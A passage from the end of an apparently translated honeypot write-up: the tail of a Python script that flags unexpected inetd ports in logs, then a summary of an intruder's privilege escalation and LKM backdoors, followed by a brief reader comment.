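    return {port: c for port, c in count_inetd_events(log_text).items()
            if port not in expected_ports}


if __name__ == "__main__":
    for port, c in audit_inetd_ports(SAMPLE_INETD_LOG, EXPECTED_PORTS).items():
        print(f"{port}: {c['bind_failures']} bind failures, "
              f"{c['extra_conf']} extra inetd.conf entries")
```

On the sample this reports 2222/tcp with five bind failures (three lines plus the "repeated 2 times" credit) and one extra configuration entry, while the failure on the expected 23/tcp is counted but not reported; the "repeated 3 times" line that follows an unrelated telnetd message is correctly ignored.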

8. Summary

This article has described one method of luring intruders, together with a detailed analysis of what a friend did during his uninvited visit: hiding his real IP behind a stepping stone, three local privilege escalation attempts with the last one succeeding, installing two LKM backdoors, and using the machine as a stepping stone to attack others. This is a typical intruder's workflow; by analysing the details of these actions we can learn about more backdoor programs, overflow exploits, troubleshooting methods, and even some interesting personal habits.

seraph
March 31, 2008 06:05
So interesting,